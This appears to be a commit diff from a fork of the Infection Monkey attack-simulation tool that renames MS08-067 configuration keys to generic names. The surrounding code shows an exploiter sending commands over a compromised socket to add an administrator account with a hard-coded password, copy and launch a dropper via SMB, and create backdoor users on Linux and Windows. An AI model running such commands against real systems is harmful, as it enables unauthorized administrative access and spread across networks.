forked from p34709852/monkey
Rename ms08_067_remote_user_add and ms08_067_remote_user_pass to something more generic
This commit is contained in:
parent
70545d28f8
commit
68093d084f
|
@ -208,8 +208,8 @@ class Configuration(object):
|
||||||
skip_exploit_if_file_exist = False
|
skip_exploit_if_file_exist = False
|
||||||
|
|
||||||
ms08_067_exploit_attempts = 5
|
ms08_067_exploit_attempts = 5
|
||||||
ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT"
|
user_to_add = "Monkey_IUSER_SUPPORT"
|
||||||
ms08_067_remote_user_pass = "Password1!"
|
remote_user_pass = "Password1!"
|
||||||
|
|
||||||
# rdp exploiter
|
# rdp exploiter
|
||||||
rdp_use_vbs_download = True
|
rdp_use_vbs_download = True
|
||||||
|
|
|
@ -57,8 +57,8 @@
|
||||||
"monkey_log_path_linux": "/tmp/user-1563",
|
"monkey_log_path_linux": "/tmp/user-1563",
|
||||||
"send_log_to_server": true,
|
"send_log_to_server": true,
|
||||||
"ms08_067_exploit_attempts": 5,
|
"ms08_067_exploit_attempts": 5,
|
||||||
"ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
|
"user_to_add": "Monkey_IUSER_SUPPORT",
|
||||||
"ms08_067_remote_user_pass": "Password1!",
|
"remote_user_pass": "Password1!",
|
||||||
"ping_scan_timeout": 10000,
|
"ping_scan_timeout": 10000,
|
||||||
"rdp_use_vbs_download": true,
|
"rdp_use_vbs_download": true,
|
||||||
"smb_download_timeout": 300,
|
"smb_download_timeout": 300,
|
||||||
|
|
|
@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
|
|
||||||
sock.send("cmd /c (net user %s %s /add) &&"
|
sock.send("cmd /c (net user %s %s /add) &&"
|
||||||
" (net localgroup administrators %s /add)\r\n" %
|
" (net localgroup administrators %s /add)\r\n" %
|
||||||
(self._config.ms08_067_remote_user_add,
|
(self._config.user_to_add,
|
||||||
self._config.ms08_067_remote_user_pass,
|
self._config.remote_user_pass,
|
||||||
self._config.ms08_067_remote_user_add))
|
self._config.user_to_add))
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
reply = sock.recv(1000)
|
reply = sock.recv(1000)
|
||||||
|
|
||||||
|
@ -213,8 +213,8 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
remote_full_path = SmbTools.copy_file(self.host,
|
remote_full_path = SmbTools.copy_file(self.host,
|
||||||
src_path,
|
src_path,
|
||||||
self._config.dropper_target_path_win_32,
|
self._config.dropper_target_path_win_32,
|
||||||
self._config.ms08_067_remote_user_add,
|
self._config.user_to_add,
|
||||||
self._config.ms08_067_remote_user_pass)
|
self._config.remote_user_pass)
|
||||||
|
|
||||||
if not remote_full_path:
|
if not remote_full_path:
|
||||||
# try other passwords for administrator
|
# try other passwords for administrator
|
||||||
|
@ -240,7 +240,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
|
|
||||||
try:
|
try:
|
||||||
sock.send("start %s\r\n" % (cmdline,))
|
sock.send("start %s\r\n" % (cmdline,))
|
||||||
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
|
sock.send("net user %s /delete\r\n" % (self._config.user_to_add,))
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
||||||
return False
|
return False
|
||||||
|
|
|
@ -36,14 +36,14 @@ class BackdoorUser(object):
|
||||||
def add_user_linux():
|
def add_user_linux():
|
||||||
cmd_line = ['useradd', '-M', '--expiredate',
|
cmd_line = ['useradd', '-M', '--expiredate',
|
||||||
datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
|
datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
|
||||||
WormConfiguration.ms08_067_remote_user_add]
|
WormConfiguration.user_to_add]
|
||||||
retval = subprocess.call(cmd_line)
|
retval = subprocess.call(cmd_line)
|
||||||
return retval
|
return retval
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def add_user_windows():
|
def add_user_windows():
|
||||||
cmd_line = ['net', 'user', WormConfiguration.ms08_067_remote_user_add,
|
cmd_line = ['net', 'user', WormConfiguration.user_to_add,
|
||||||
WormConfiguration.ms08_067_remote_user_pass,
|
WormConfiguration.remote_user_pass,
|
||||||
'/add', '/ACTIVE:NO']
|
'/add', '/ACTIVE:NO']
|
||||||
retval = subprocess.call(cmd_line)
|
retval = subprocess.call(cmd_line)
|
||||||
return retval
|
return retval
|
||||||
|
|
|
@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
|
||||||
"""
|
"""
|
||||||
LOG.debug("Running Windows collector")
|
LOG.debug("Running Windows collector")
|
||||||
super(WindowsInfoCollector, self).get_info()
|
super(WindowsInfoCollector, self).get_info()
|
||||||
self.get_wmi_info()
|
#self.get_wmi_info()
|
||||||
self.get_installed_packages()
|
self.get_installed_packages()
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
if WormConfiguration.should_use_mimikatz:
|
if WormConfiguration.should_use_mimikatz:
|
||||||
|
|
|
@ -701,14 +701,14 @@ SCHEMA = {
|
||||||
"default": 5,
|
"default": 5,
|
||||||
"description": "Number of attempts to exploit using MS08_067"
|
"description": "Number of attempts to exploit using MS08_067"
|
||||||
},
|
},
|
||||||
"ms08_067_remote_user_add": {
|
"user_to_add": {
|
||||||
"title": "MS08_067 remote user",
|
"title": "Remote user",
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"default": "Monkey_IUSER_SUPPORT",
|
"default": "Monkey_IUSER_SUPPORT",
|
||||||
"description": "Username to add on successful exploit"
|
"description": "Username to add on successful exploit"
|
||||||
},
|
},
|
||||||
"ms08_067_remote_user_pass": {
|
"remote_user_pass": {
|
||||||
"title": "MS08_067 remote user password",
|
"title": "Remote user password",
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"default": "Password1!",
|
"default": "Password1!",
|
||||||
"description": "Password to use for created user"
|
"description": "Password to use for created user"
|
||||||
|
|
Loading…
Reference in New Issue